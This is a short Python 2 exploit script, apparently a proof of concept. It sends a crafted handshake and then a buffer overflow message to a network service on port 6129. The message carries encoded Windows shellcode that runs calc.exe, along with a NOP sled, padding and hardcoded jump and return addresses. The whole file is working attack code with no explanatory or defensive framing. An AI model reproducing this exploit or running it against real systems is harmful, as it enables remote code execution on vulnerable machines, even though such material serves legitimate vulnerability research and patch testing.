import socket
import sys
import os
import time
import struct
import binascii
import random
  
# windows/exec - 220 bytes
# Encoder: x86/shikata_ga_nai
# VERBOSE=false, PrependMigrate=false, EXITFUNC=process,
# CMD=calc.exe
  
MsgBox = (
"\x31\xD2\x52\x68\x63\x61\x6C\x63\x89\xE6\x52\x56\x64"
"\x8B\x72\x30\x8B\x76\x0C\x8B\x76\x0C\xAD\x8B\x30\x8B"
"\x7E\x18\x8B\x5F\x3C\x8B\x5C\x1F\x78\x8B\x74\x1F\x20"
"\x01\xFE\x8B\x4C\x1F\x24\x01\xF9\x42\xAD\x81\x3C\x07"
"\x57\x69\x6E\x45\x75\xF5\x0F\xB7\x54\x51\xFE\x8B\x74"
"\x1F\x1C\x01\xFE\x03\x3C\x96\xFF\xD7")
  
#pading = "A"*(0x20b+0x9) + "B"*(0x225-0x9)
#pading = "A"*(0x20b+0x9) + sc
attack = "\x90"*0x10 + MsgBox + "A"*(0x214 - 0x10 - len(MsgBox)) + "B"*(0x162) + "\xeb\x06\x90\x90"  + "\x6d\x14\x40\x00" + "\xe8\x37\xd4\xfe\xff" + "D"*(0xb6-0x4-0x5)
port = 6129
  
#if len (sys.argv) == 2:
# (progname, host ) = sys.argv
#else:
# print len (sys.argv)
# print 'Usage: {0} host'.format (sys.argv[0])
# exit (1)
host = '0:0:0:0:0:0:0:1'
csock = socket.socket( socket.AF_INET6, socket.SOCK_STREAM)
csock.connect ( (host, int(port)) )
  
type = 444.0
buf = struct.pack("I", 4400 ) #Init Version
buf += "\xcc"*4
buf += struct.pack("d", type) #Minor Version
buf += struct.pack("d", type) #Minor Version
buf += (40 - len(buf)) * "C"#csock.send(buf)
csock.send(buf)
print binascii.hexlify(csock.recv(0x4000)) #necessary reads
  
  
buf = struct.pack("I", 0x9c44) #msg type
#buf += pading #payload
buf += attack
#buf += ("%" + "\x00" + "c" + "\x00")
csock.send(buf)
  
  
print binascii.hexlify(csock.recv(0x4000))
  
csock.close()